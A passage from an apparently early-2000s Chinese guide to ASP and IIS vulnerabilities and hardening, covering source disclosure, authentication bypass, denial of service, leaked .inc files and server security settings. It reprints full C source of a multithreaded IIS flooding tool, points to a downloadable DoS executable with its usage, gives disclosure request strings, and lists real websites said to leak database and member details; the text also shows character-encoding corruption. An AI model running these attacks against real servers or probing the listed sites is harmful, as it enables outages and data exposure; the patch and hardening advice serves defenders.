很明顯,這個(gè)請(qǐng)求肯定會(huì)失敗,因?yàn)橄到y(tǒng)上不存在這個(gè)文件。但請(qǐng)注意,我們現(xiàn)在已經(jīng)調(diào)用到了webhits.dll,我們只要在一個(gè)存在的文件資源后面[也就是在.htw前面]加上一串特殊的數(shù)字( %20s ),[就是在例子中default.htm后面加上這個(gè)代表空格的特殊數(shù)字],這樣我們便可以欺騙過web服務(wù)器從而達(dá)到我們的目的.由于在緩沖部分中.htw文件名字部分被刪除掉[由于%20s這個(gè)符號(hào)],所以,當(dāng)請(qǐng)求傳送到webhits.dll的時(shí)候,便可以成功的打開該文件,并返回給客戶端,而且過程中并不要求系統(tǒng)中真的存在.htw文件。

問題解決和建議:

微軟已經(jīng)對(duì)該問題發(fā)放了補(bǔ)丁:

Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Windows 2000 Indexing Services:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726


15 繞過驗(yàn)證直接進(jìn)入ASP頁面

漏洞描述:

如果用戶知道了一個(gè)ASP頁面的路徑和文件名,而這個(gè)文件又是要經(jīng)過驗(yàn)證才能進(jìn)去的,但是用戶直接輸入這個(gè)ASP頁面的文件名,就有可能通過繞過驗(yàn)證.比如:我在一些網(wǎng)站上這樣試過:首先關(guān)閉所有的瀏覽器,窗口,輸入:
http://someurl/system_search.asp?page=1
就樣就看到了只能系統(tǒng)員才能看到的頁面。當(dāng)然有些人為了防止這種情況也會(huì)在system_search.asp的開頭加個(gè)判斷,比如:判斷session("system_name"),如果不為空時(shí)就能進(jìn)入,這樣上面的url請(qǐng)求就不能直接進(jìn)入管理員頁面了。但是這種方法也有一個(gè)漏洞,如果攻擊者先用一個(gè)合法的帳號(hào),或者在本機(jī)上生成一個(gè)session,如session("system_name")="admi",那因?yàn)閟ession("system_name")不為空,這樣也能直接進(jìn)入繞過密碼,直接進(jìn)入管理員頁面。

解決方法:

在需要驗(yàn)證的ASP頁面開頭處進(jìn)行相應(yīng)的處理。比如:可跟蹤上一個(gè)頁面的文件名,只有從上一頁面轉(zhuǎn)進(jìn)來的會(huì)話才能讀取這個(gè)頁面。


16、IIS4.0/5.0特殊數(shù)據(jù)格式的URL請(qǐng)求遠(yuǎn)程DOS攻擊

漏洞描述:

當(dāng)在安裝有有IIS4.0或者IIS5.0的web服務(wù)上,請(qǐng)求一個(gè)具有特殊數(shù)據(jù)格式的URL,會(huì)拖慢受攻擊web 服務(wù)器的響應(yīng)速度,或許會(huì)使其暫時(shí)停止響應(yīng)。

受影響的版本

Microsoft Internet Information Server 4.0
Microsoft Internet Information Server 5.0

漏洞測(cè)試程序如下:

http://202.96.168.51/download/exploits/iisdos.exe
源代碼如下:
http://202.96.168.51/download/exploits/iisdos.zip
測(cè)試程序:
只要打入:iisdos <***.***.**.**> 就能攻擊對(duì)方web 服務(wù)器

問題解決:

Internet Information Server 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
Internet Information Server 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904
更多的信息:
http://www.microsoft.com/technet/security/bulletin/ms00-030.asp
Microsoft 安全公告MS00-021:
http://www.microsoft.com/technet/security/bulletin/fq00-030.asp
相關(guān)連接
http://www.ussrback.com


17 IIS web server DOS

漏洞描述:

默認(rèn)情況下,IIS容易被拒絕服務(wù)攻擊。如果注冊(cè)表中有一個(gè)叫 "MaxClientRequestBuffer" 的鍵未被創(chuàng)建,針對(duì)這種NT系統(tǒng)的攻擊通常能奏效。 "MaxClientRequestBuffer" 這個(gè)鍵用于設(shè)置IIS允許接受的輸入量。如果 "MaxClientRequestBuffer" 設(shè)置為256(bytes),則攻擊者通過輸入大量的字符請(qǐng)求IIS將被限制在256字節(jié)以內(nèi)。而系統(tǒng)的缺省設(shè)置對(duì)此不加限制,因此,利用下面的程序??梢院苋菀椎貙?duì)IIS server實(shí)行DOS攻擊:

#include <stdio.h>
#include <windows.h>
#define MAX_THREAD 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
WORD tequila;
WSADATA data;
int p;
DWORD tid;
HANDLE hThread[2000];
//This code is as is and sucks as it is. Wont exit correctly and a lot
of other fun things.
//That I didnt want to take the time to do. So just ctrl+c out of the
code.
//Load up cnghack.exe 3 times for charm.
printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my
beloved.\"\n");
if(argc<2){
printf("Usage: %s [server] [port]\n",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, A, strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = MAKEWORD( 1, 1 );
printf("Attempting to start winsock... ");
if( (WSAStartup(tequila, &data)) !=0 ){
printf("failed to start winsock.\n");
exit(1);
}
else{
printf("started winsock.\n\n");
}

counter = 0;
for(p = 0 ; p < MAX_THREAD ; ++p ){
hThread[counter] = CreateThread(0,
0,
(LPTHREAD_START_ROUTINE) cng,
( void * )++counter,
0,
&tid);
}
Sleep(250);
while( current_threads )
Sleep(250);
counter = 0;
printf("Terminated Threads.\n");
while (counter < MAX_THREAD)
{
TerminateThread( hThread[counter], 0 );
++counter;
}
WSACleanup();
return 0;
}

void cng()
{
int SockFD=0, p;
struct sockaddr_in DstSAin;
char GETKILLED[]="GET / HTTP/\r\n";
int die=1;
printf("Entered CNG\n");
++current_threads;
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons((u_short)port);
DstSAin.sin_addr.s_addr=inet_addr( server );
if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){
printf("Failed to create socket\n");
--current_threads;
return;
}
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
p=send(SockFD,GETKILLED,strlen(GETKILLED),0);
printf("Step 1: %i\n", p);
for(;;){
p=send(SockFD,buffer,strlen(buffer),0);
printf("P: %i\n", p);
//put in some code to check if send = -1 more then X times we drop
the loop and exit the thread
//bla bla bla i love the dirtiness of concept code.
}
}
--current_threads;
printf("Exited CNG\n");
return;
}

cnghack.c works by doing the following:
Connects to example.com
Sends: GET / HTTP/[return][buffer]

Where:
[return] is just an \r\n
[buffer] is a never ending stream of As

攻擊結(jié)果將導(dǎo)致NT系統(tǒng)的CPU占用率達(dá)到 100%

解決方案

運(yùn)行Regedt32.exe
在:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters
增加一個(gè)值:
Value Name: MaxClientRequestBuffer
Data Type: REG_DWORD
設(shè)置為十進(jìn)制
具體數(shù)值設(shè)置為你想設(shè)定的IIS允許接受的URL最大長(zhǎng)度。

18、MS ODBC數(shù)據(jù)庫(kù)連接溢出導(dǎo)致NT/9x拒絕服務(wù)攻擊

漏洞描述:

Microsoft ODBC數(shù)據(jù)庫(kù)在連接和斷開時(shí)可能存在潛在的溢出問題(Microsoft ACCESS數(shù)據(jù)庫(kù)相關(guān))。
如果不取消連接而直接和第二個(gè)數(shù)據(jù)庫(kù)相連接,可能導(dǎo)致服務(wù)停止。

影響系統(tǒng):

ODBC 版本: 3.510.3711.0
ODBC Access驅(qū)動(dòng)版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)

漏洞檢測(cè)方法如下:

ODBC 連接源名稱: miscdb
ODBC 數(shù)據(jù)庫(kù)型號(hào): MS Access
ODBC 假設(shè)路徑: d:\data\misc.mdb

ASP代碼如下:

<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"

%>

<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
Note we do NOT close the connection
%>

<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)

While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
Note we DO close the connection
%>

在這種情況下,IIS處理進(jìn)程將會(huì)停頓,CPU使用率由于inetinfo.exe進(jìn)程將達(dá)到100%。只有重新啟動(dòng)計(jì)算機(jī)才能恢復(fù)。


19、ASP主頁.inc文件泄露問題

漏洞描述:

受影響的版本:任何提供ASP服務(wù)的系統(tǒng)
遠(yuǎn)程:YES / 本地:YES

內(nèi)容摘要:

當(dāng)存在asp的主頁正在制作并沒有進(jìn)行最后調(diào)試完成以前,可以被某些搜索引擎機(jī)動(dòng)追加為搜索對(duì)象,如果這時(shí)候有人利用搜索引擎對(duì)這些網(wǎng)頁進(jìn)行查找,會(huì)得到有關(guān)文件的定位,并能在瀏覽器中察看到數(shù)據(jù)庫(kù)地點(diǎn)和結(jié)構(gòu)的細(xì)節(jié)揭示完整的源代碼。
具體操作過程是:

- 利用搜索引擎查找包含+"Microsoft VBScript 運(yùn)行時(shí)刻錯(cuò)誤執(zhí)行搜索" +".inc ," 的關(guān)鍵字
- 搜索引擎會(huì)自動(dòng)查找包含asp的包含文件(.inc)并顯示給用戶
- 利用瀏覽器觀看包含文件的源代碼,其中可能會(huì)有某些敏感信息

漏洞的利用:

例子:
- http://shopping.altavista.com/inc/lib/prep.lib
暴露數(shù)據(jù)庫(kù)連接和性質(zhì), 資源地點(diǎn), 小甜餅邏輯,服務(wù)器 IP 地址
- http://www.justshop.com/SFLib/ship.inc
暴露數(shù)據(jù)庫(kù)性質(zhì)
- http://www.bbclub.com:8013/includes/general.inc
暴露 cobranding
- http://www.salest.com/corporate/admin/include/jobs.inc
暴露 datafile 地點(diǎn)和結(jié)構(gòu)
- http://www.bjsbabes.com/SFLib/design.inc
包括數(shù)據(jù)庫(kù)結(jié)構(gòu)為 StoreFront 2000 暴露源代碼
- http://www.ffg.com/scripts/IsSearchEngine.inc
暴露搜索引擎記錄文件
- http://www.wcastl.com/include/functions.inc
暴露成員電子郵件地址
- http://www.wcastl.com/flat/comments.txt
暴露成員私人的注釋文件
- http://www.traveler.net/two/cookies.inc
暴露 cookie 邏輯

解決方案:

- 搜索引擎應(yīng)該不索引有 asp 運(yùn)行時(shí)刻錯(cuò)誤的頁
- 程序員應(yīng)該在網(wǎng)頁發(fā)布前對(duì)其進(jìn)行徹底的調(diào)試
- 安全專家需要固定 asp 包含文件以便外部的用戶不能看到它們
asp 新聞組、站點(diǎn)提供兩個(gè)解決方案對(duì)這個(gè)漏洞進(jìn)行修正,首先對(duì) .inc 文件內(nèi)容進(jìn)行加密,其次也可以使用 .asp 文件代替
.inc 文件使用戶無法從瀏覽器直接觀看文件的源代碼。.inc 文件的文件名不用使用系統(tǒng)默認(rèn)的或者有特殊含義容易被用戶猜測(cè)到的,盡量使用無規(guī)則的英文字母。


20、利用Activer server explorer可對(duì)文件進(jìn)行讀寫訪問

漏洞描述:

chinaasp的Activer server explorer可以很方便的對(duì)本地文件在線查看服務(wù)器上的目錄 在線查看文件的名稱、大小、類型、修改時(shí)間,在線編輯純文本文件,如.txt、.htm、.asp、.pl、.cgi等等,直接執(zhí)行服務(wù)器上的文件。
Activer server explorer要求填寫相對(duì)路徑或者絕對(duì)路徑,但是假如:有一個(gè)攻擊者把Activer server explorer上傳到目標(biāo)服務(wù)器上的某個(gè)目錄,并且這個(gè)目錄支持ASP的話,那么他就可以通過Activer server explorer修改、執(zhí)行目標(biāo)服務(wù)器上的文件。這種情況可以發(fā)生在一個(gè)攻擊者擁有目標(biāo)NT服務(wù)器上的一個(gè)可寫目錄帳號(hào),并且這個(gè)目錄又支持ASP。比如一些支持ASP的個(gè)人免費(fèi)主頁服務(wù)器,把Activer server explorer先傳上你申請(qǐng)的免費(fèi)主頁空間,再通過各種方法得到目標(biāo)服務(wù)器的路徑,(比如可通過漏洞:"請(qǐng)求不存在的擴(kuò)展名為idq或ida 文件,會(huì)暴露文件在服務(wù)器上的物理地址.").或者直接在相對(duì)路徑上填".",一般是默認(rèn)。這樣攻擊者就能任意修改,執(zhí)行目標(biāo)服務(wù)器上的文件,不管他對(duì)這個(gè)文件有無讀寫訪問權(quán)。
所以那些提供有ASP服務(wù)的個(gè)人主頁或者其它服務(wù)的服務(wù)器,就要加倍小心這種攻擊了。

漏洞解決方法

其實(shí)Activer server explorer就是利用了上面講的漏洞 4 filesystemobject 組件篡改下載 fat 分區(qū)上的任何文件的漏洞。
那么我們?nèi)绾尾拍芟拗朴脩羰褂肍ileSystemObject對(duì)象呢?一種極端的做法是完全反注冊(cè)掉提供FileSystemObject對(duì)象的那個(gè)組件,也就是Scrrun.dll。具體的方法如下:

  在MS-DOS狀態(tài)下面鍵入:

Regsvr32 /u c:\windows\system\scrrun.dll

(注意:在實(shí)際操作的時(shí)候要更改成為你本地的實(shí)際路徑)

  但是這樣的話,就不能使用FileSystemObject對(duì)象了,有時(shí)利用FileSystemObject對(duì)象來管理文件是很方便,有什么辦法能兩全其美呢?

我們可以做到禁止他人非法使用FileSystemObject對(duì)象,但是我們自己仍然可以使用這個(gè)對(duì)象.
方法如下:
查找注冊(cè)表中

   HKEY_CLASSES_ROOT\Scripting.FileSystemObject 鍵值

  將其更改成為你想要的字符串(右鍵-->"重命名"),比如更改成為

   HKEY_CLASSES_ROOT\Scripting.FileSystemObject2

  這樣,在ASP就必須這樣引用這個(gè)對(duì)象了:

   Set fso = CreateObject("Scripting.FileSystemObject2")

  而不能使用:

   Set fso = CreateObject("Scripting.FileSystemObject")

  如果你使用通常的方法來調(diào)用FileSystemObject對(duì)象就會(huì)無法使用了。

  只要你不告訴別人這個(gè)更改過的對(duì)象名稱,其他人是無法使用FileSystemObject對(duì)象的。這樣,作為站點(diǎn)管理者我們就杜絕了他人非法使用FileSystemObject對(duì)象,而我們自己仍然可以使用這個(gè)對(duì)象來方便的實(shí)現(xiàn)網(wǎng)站在線管理等等功能了!


21 IIS4.0/IIS5.0超長(zhǎng)文件名請(qǐng)求存在漏洞

漏洞描述:

受影響的版本:

Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0

當(dāng)在一個(gè)已知的文件名后加230個(gè)"%20"再加個(gè).htr,會(huì)使安裝有Microsoft IIS 4.0/5.0泄漏該文件的內(nèi)容。這是由ISM.dll映射的.htr文件引起的.比如:

http://target/filename%20<重復(fù)230次>.htr

這種請(qǐng)求只有當(dāng).htr請(qǐng)求是第一次調(diào)用或者ISM.dll第一次裝載進(jìn)內(nèi)存,才能起作用。

解決方法:

安裝補(bǔ)丁

Microsoft IIS 5.0:
http://download.microsoft.com/download/win2000platform/Patch/Q249599/NT5/EN-US/Q249599_W2K_SP1_X86_en.EXE

Microsoft IIS 4.0:
http://download.microsoft.com/download/iis40/Patch/Q260838/NT4ALPHA/EN-US/ismpst4i.exe


22 ASP編輯器會(huì)自動(dòng)備份asp文件,會(huì)被下載的漏洞

漏洞描述:

  在有些編輯asp程序的工具,當(dāng)創(chuàng)建或者修改一個(gè)asp文件時(shí),編輯器自動(dòng)創(chuàng)建一個(gè)備份文件,比如:UltraEdit就會(huì)備份一個(gè)..bak文件,如你創(chuàng)建或者修改了some.asp,編輯器自動(dòng)生成一個(gè)叫some.asp.bak文件,如果你沒有刪除這個(gè)bak文件,攻擊有可以直接下載some.asp.bak文件,這樣some.asp的源程序就會(huì)給下載。

六 ASP安全建議

如何設(shè)置才能使ASP更加安全呢?以下我們重點(diǎn)來談?wù)凙SP安全方面要注意的問題。我們?cè)诘谖宀糠?ASP漏洞和解決方法"中針對(duì)某些漏洞,也提出了相應(yīng)的安全建議,這部分就不再重復(fù)。
  在這部分的后面還要介紹些可掃描ASP漏洞的工具。


1 安裝NT最新的補(bǔ)丁

目前最新的補(bǔ)丁是NT Option Pack 6.0.,微軟的主頁有最新的補(bǔ)丁。一般來說微軟都會(huì)及時(shí)的公布最新的漏洞和補(bǔ)丁。目前IIS最新是5.0。windows2000自帶IIS5.0.
IIS 5.0新功能如下:
安全性上:包括摘要式驗(yàn)證、整合的Windows驗(yàn)證、SGC (Server-Gated Cryptography ) 、Microsoft Certificate
Services 2.0、集區(qū)處理程序之程序保護(hù)等。
管理上:包括IIS重新激活、站臺(tái)CPU使用時(shí)間的限制、CPU資源使用記錄、使用終端機(jī)服務(wù)遠(yuǎn)程管理IIS、自訂錯(cuò)誤訊息等。
Internet標(biāo)準(zhǔn)上:包括WebDAV(Web Distributed Authoring and Versioning)、FTP重新激活、HTTP壓縮等。

Active Server Pages:包括新的轉(zhuǎn)向方法(Server.Transfer與Server.Execute方法)、新的錯(cuò)誤處理功能
(Server.GetLastError方法)、無指令.asp的執(zhí)行速度增快、可安裝組件的效能調(diào)升、Scriptlet支持、使用cookie取得瀏覽器信息、自動(dòng)增減執(zhí)行緒(executing threads)、SRC服務(wù)器端包含功能、Script Encoder編碼保護(hù)等。
更具體的功能介紹請(qǐng)參見其它資料。


2 關(guān)閉沒有用的服務(wù)和協(xié)議

"盡量少開沒用到的服務(wù)",這永遠(yuǎn)是網(wǎng)絡(luò)安全的準(zhǔn)則。如果開啟了某個(gè)服務(wù),你就要面對(duì)不少的漏洞困擾,更重要的是你還要時(shí)時(shí)提防未來的由這個(gè)服務(wù)所引起的漏洞。
比如,你不使用ftp,那就把FTP關(guān)了,不然你就要發(fā)費(fèi)大量的精力和金錢去應(yīng)付那些什么DOS,緩沖區(qū)溢出之類的漏洞。NETBIOS也是windows的一大安全隱患,我想目前服務(wù)器很少需要Netbios。再如你的IIS安裝了index server 服務(wù),那你至少要面對(duì)三個(gè)以上的有關(guān)這個(gè)服務(wù)的漏洞,因此如果你沒用到INDEX SERVER服務(wù),也大可刪除他.
同樣的道理,我們要安裝最少的協(xié)議。千萬不要安裝點(diǎn)對(duì)點(diǎn)通道通訊協(xié)議。此外,還必須小心地配置TCP/IP協(xié)議。在TCP/IP的屬性頁中選擇"IP地址"項(xiàng)目,然后選擇"高級(jí)"。在彈出來的對(duì)話框中選擇"安全機(jī)制",這樣你可以禁止UDP,然后開啟IP端口6和TCP端口80。當(dāng)然開不開這些端口主要是看你的情況了。
IIS中的應(yīng)用程序映射也是個(gè)很大的安全漏洞,請(qǐng)?jiān)贗IS中設(shè)置好擴(kuò)展名和可執(zhí)行路徑,刪除沒用的擴(kuò)展名。


3 設(shè)置好你的NT

NT缺省安裝時(shí),系統(tǒng)賬號(hào)Administrator和Guest被自動(dòng)設(shè)置,很多攻擊者就是利用這些賬號(hào)來猜密碼,從而進(jìn)入你的系統(tǒng)。雖然沒有足夠的耐心,很難猜中這些密碼,但是為了安全起見,建議把這些賬號(hào)重新命名或者刪除。
NT SERVER的系統(tǒng)策略編輯器非常有用。按"管理工具"->"系統(tǒng)策略編輯器"就可以進(jìn)入,然后選擇"文件"->"打開注冊(cè)表",并選擇"本地計(jì)算機(jī)"圖標(biāo),就可以認(rèn)真配置了。主要設(shè)置以下幾項(xiàng):

1. 取消:網(wǎng)絡(luò)->系統(tǒng)規(guī)則更新->遠(yuǎn)程更新
2. 取消:WINDOWS NT網(wǎng)絡(luò)->共享->創(chuàng)建隱藏的驅(qū)動(dòng)器共享
3. 設(shè)置:Windows NT遠(yuǎn)程訪問下面的各項(xiàng)
4. 設(shè)置:Windows NT系統(tǒng)->登錄中各個(gè)項(xiàng)目。包括設(shè)置登錄標(biāo)記;不允許從"身份驗(yàn)證對(duì)話框"關(guān)機(jī);不顯示上次登錄的用戶名.
5. 設(shè)置:WINDOWS NT系統(tǒng)->文件系統(tǒng)中的"不為長(zhǎng)文件名創(chuàng)建8.3文件名"

不要使用遠(yuǎn)程管理軟件,除非不得已。由于NT不太支持遠(yuǎn)程管理,所以你可能會(huì)安裝Reachout或者PC anywhere來管理??墒?,當(dāng)你安裝了這些軟件,你就不得不開啟TCP/IP的所有端口。
在你離開服務(wù)器的時(shí)候,請(qǐng)按"Ctrl+del+alt",并選擇"鎖定工作站"。


4 磁盤文件格式使用比較安全的NTFS格式

NTFS 權(quán)限是 Web 服務(wù)器安全性的基礎(chǔ),它定義了一個(gè)或一組用戶訪問文件和目錄的不同級(jí)別。當(dāng)擁有 Windows NT 有效帳號(hào)的用戶試圖訪問一個(gè)有權(quán)限限制的文件時(shí),計(jì)算機(jī)將檢查文件的 訪問控制表 (ACL)。該表定義了不同用戶和用戶組 所被賦予的權(quán)限。例如,Web 服務(wù)器上的 Web 應(yīng)用程序的所有者需要有"更改"權(quán)限來查看、更改和刪除應(yīng)用程序的 .asp 文件。但是,訪問該應(yīng)用程序的公共用戶應(yīng)僅被授予"只讀"權(quán)限,以便將其限制為只能查看而不能更改應(yīng)用程序的 Web 頁。

5 對(duì)目錄設(shè)置不同的屬性,如:Read、Excute、Script

您可以通過配置您的 Web 服務(wù)器的權(quán)限來限制所有用戶查看、運(yùn)行和操作您的ASP 頁的方式。不同于 NTFS 權(quán)限提供的控制特定用戶對(duì)應(yīng)用程序文件和目錄的訪問方式, Web 服務(wù)器權(quán)限應(yīng)用于所有用戶,并且不區(qū)分用戶帳號(hào)的類型。 對(duì)于要運(yùn)行您的 ASP 應(yīng)用程序的用戶,在設(shè)置 Web 服務(wù)器權(quán)限時(shí),必須遵循下列原則:
對(duì)包含 .asp 文件的虛擬目錄允許"讀"或"腳本"權(quán)限。
對(duì) .asp 文件和其他包含腳本的文件(如 .htm 文件等)所在的虛目錄允許"讀"和"腳本"權(quán)限。
對(duì)包含 .asp 文件和其他需要"執(zhí)行"權(quán)限才能運(yùn)行的文件(如 .exe 和 .dll 文件等)的虛目錄允許"讀"和"執(zhí)行"權(quán)限。


6 維護(hù) Global.asa 的安全

為了充分保護(hù) ASP 應(yīng)用程序,一定要在應(yīng)用程序的 Global.asa 文件上為適當(dāng)?shù)挠脩艋蛴脩艚M設(shè)置 NTFS 文件權(quán)限。
如果 Global.asa 包含向?yàn)g覽器返回信息的命令而您沒有保護(hù) Global.asa 文件,則信息將被返回給瀏覽器,即便應(yīng)用程序的其他文件被保護(hù)。


7 不要把密碼,物理路徑直接寫在程序中

很難保證您的ASP程序是否會(huì)給人拿到,即使你安裝了最新的補(bǔ)丁。為
了安全起見,應(yīng)該把密碼和用戶名保存在數(shù)據(jù)庫(kù)中,使用虛擬路徑。


8 在程序中記錄用戶的詳細(xì)信息

這些信息包括用戶的瀏覽器、用戶停留的時(shí)間,用戶IP等。其中
記錄IP是最有用的。
可用下面的語句了解客戶端和服務(wù)端的信息:

<Table><%for each name in request.servervariables%>
<tr><td><%=name%>:</td>
<td><%=request.servervariables(name)%></td>
</tr>
<%next%></table>

如果我們可以記錄了用戶的IP,就能通過追捕來查用戶的具體地點(diǎn)。
當(dāng)然如果用戶通過代理來瀏覽網(wǎng)頁,上面的方法只能看到用戶代理的IP,而不能記錄用戶真實(shí)的IP。ASP沒有提供查看客戶端網(wǎng)卡物理地址(即MAC)的功能。


9 Cookie 安全性

ASP 使用 SessionID cookie 跟蹤應(yīng)用程序訪問或會(huì)話期間特定的 Web 瀏覽器的信息。這就是說,帶有相應(yīng)的 cookie 的 HTTP 請(qǐng)求被認(rèn)為是來自同一 Web 瀏覽器。Web 服務(wù)器可以使用 SessionID cookies 配置帶有用戶特定會(huì)話信息的 ASP 應(yīng)用程序。例如,如果您的應(yīng)用程序是一個(gè)允許用戶選擇和購(gòu)買 CD 唱盤的聯(lián)機(jī)音樂商店,就可以用 SessionID 跟蹤用戶漫游整個(gè)應(yīng)用程序時(shí)的選擇。
SessionID 能否被黑客猜中?
為了防止計(jì)算機(jī)黑客猜中 SessionID cookie 并獲得對(duì)合法用戶的會(huì)話變量的訪問,Web 服務(wù)器為每個(gè) SessionID 指派一個(gè)隨機(jī)生成號(hào)碼。每當(dāng)用戶的 Web 瀏覽器返回一個(gè) SessionID cookie 時(shí),服務(wù)器取出 SessionID 和被賦予的數(shù)字,接著檢查是否與存儲(chǔ)在服務(wù)器上的生成號(hào)碼一致。若兩個(gè)號(hào)碼一致,將允許用戶訪問會(huì)話變量。這一技術(shù)的有效性在于被賦予的數(shù)字的長(zhǎng)度(64 位),此長(zhǎng)度使計(jì)算機(jī)黑客猜中 SessionID 從而竊取用戶的活動(dòng)會(huì)話的可能性幾乎為 0。
加密重要的 SessionID Cookie.
截獲了用戶 sessionID cookie 的計(jì)算機(jī)黑客可以使用此 cookie 假冒該用戶。如果 ASP 應(yīng)用程序包含私人信息,信用卡或銀行帳戶號(hào)碼,擁有竊取的 cookie 的計(jì)算機(jī)黑客就可以在應(yīng)用程序中開始一個(gè)活動(dòng)會(huì)話并獲取這些信息。您可以通過對(duì)您的 Web 服務(wù)器和用戶的瀏覽器間的通訊鏈路加密來防止 SessionID cook ie 被截獲。


10 使用身份驗(yàn)證機(jī)制保護(hù)被限制的 ASP 內(nèi)容

可以要求每個(gè)試圖訪問被限制的 ASP 內(nèi)容的用戶必須要有有效的 Windows NT帳號(hào)的用戶名和密碼。每當(dāng)用戶試圖訪問被限制的內(nèi)容時(shí),Web 服務(wù)器將進(jìn)行身份驗(yàn)證,即確認(rèn)用戶身份,以檢查用戶是否擁有有效的 Windows NT 帳號(hào)。
Web 服務(wù)器支持以下幾種身份驗(yàn)證方式:
基本身份驗(yàn)證 提示用戶輸入用戶名和密碼。
Windows NT 請(qǐng)求/響應(yīng)式身份驗(yàn)證,從用戶的 Web 瀏覽器通過加密方式獲取用戶身份信息。
然而,Web 服務(wù)器僅當(dāng)禁止匿名訪問或 Windows NT 文件系統(tǒng)的權(quán)限限制匿名訪問時(shí)才驗(yàn)證用戶


11 保護(hù)源數(shù)據(jù)庫(kù)

訪問源數(shù)據(jù)庫(kù)的 ASP 腳本需要 Web 服務(wù)器所運(yùn)行的計(jì)算機(jī)的管理員權(quán)限。在從遠(yuǎn)程計(jì)算機(jī)上運(yùn)行這些腳本時(shí),須經(jīng)已通過身份驗(yàn)證的連接,如使用 Windows NT 請(qǐng)求/響應(yīng)驗(yàn)證方式進(jìn)行連接。應(yīng)該為管理級(jí) .asp 文件創(chuàng)建一個(gè)服務(wù)器或目錄并將其目錄安全驗(yàn)證方式設(shè)置為 Windows NT 請(qǐng)求/響應(yīng)式身份驗(yàn)證。目前,僅 Microsoft Internet Explorer version 2.0 或更高版本支持 Windows NT 請(qǐng)求響應(yīng)式身份驗(yàn)證。


12 使用 SSL 維護(hù)應(yīng)用程序的安全

SSL (Secure Sockets Layer)協(xié)議是由Netscape首先發(fā)表的網(wǎng)絡(luò)資料安全傳輸協(xié)定,其首要目的是在兩個(gè)通信間提供秘密而可靠的連接。該協(xié)議由兩層組成,底層是建立在可靠的傳輸協(xié)議(例如:TCP)上的是SSL的記錄層,用來封裝高層的協(xié)議。SSL握手協(xié)議準(zhǔn)許服務(wù)器端與客戶端在開始傳輸數(shù)據(jù)前,能夠通過特定的加密算法相互鑒別。SSL的先進(jìn)之處在于它是一個(gè)獨(dú)立的應(yīng)用協(xié)議,其它更高層協(xié)議能夠建立在SSL協(xié)議上。
SSL3.0 協(xié)議作為 Web 服務(wù)器安全特性,提供了一種安全的虛擬透明方式來建立與用戶的加密通訊連接。SSL 保證了 Web 內(nèi)容的驗(yàn)證,并能可靠地確認(rèn)訪問被限制的 Web 站點(diǎn)的用戶的身份。
通過 SSL,您可以要求試圖訪問被限制的 ASP 應(yīng)用程序的用戶與您的服務(wù)器建立一個(gè)加密連接;以防用戶與應(yīng)用程序間交換的重要信息被截取。
比如好多基于WEB的ASP論壇都會(huì)提供注冊(cè)用戶互相發(fā)送信息的服務(wù),這種信息是明文傳送的,如果在網(wǎng)吧就很容易給人監(jiān)聽到。如果加了一層SSL認(rèn)證,就會(huì)防止發(fā)送信息被監(jiān)聽的可能。


13 客戶資格認(rèn)證

控制對(duì)您的 ASP 應(yīng)用程序訪問的一種十分安全的方法是要求用戶使用 客戶資格登錄??蛻糍Y格是包含用戶身份信息的數(shù)字身份證,它的作用與傳統(tǒng)的諸如護(hù)照或駕駛執(zhí)照等身份證明相同。用戶通常從委托的第三方組織獲得客戶資格,第三方組織在發(fā)放資格證之前確認(rèn)用戶的身份信息。(通常,這類組織要求姓名、地址、電話號(hào)碼及所在組織名稱;此類信息的詳細(xì)程度隨給予的身份等級(jí)而異。)
每當(dāng)用戶試圖登錄到需要資格驗(yàn)證的應(yīng)用程序時(shí),用戶的 Web 瀏覽器會(huì)自動(dòng)向服務(wù)器發(fā)送用戶資格。如果 Web 服務(wù)器的 Secure Sockets Layer (SSL) 資格映射特性配置正確,那么服務(wù)器就可以在許可用戶對(duì) ASP 應(yīng)用程序訪問之前對(duì)其身份進(jìn)行確認(rèn)。
作為 ASP 應(yīng)用程序開發(fā)人員,您可以編寫腳本來檢查資格是否存在并讀取資格字段。例如,您可以從資格證明中訪問用戶名字段和公司名字段。Active Server Pages 在 Request 對(duì)象的 ClientCertificate 集合中保存資格信息。
必須將 Web 服務(wù)器配置為接受或需要客戶資格,然后才能通過 ASP 處理客戶資格;否則,ClientCertificate 集合將為空。


14 ASP的加密

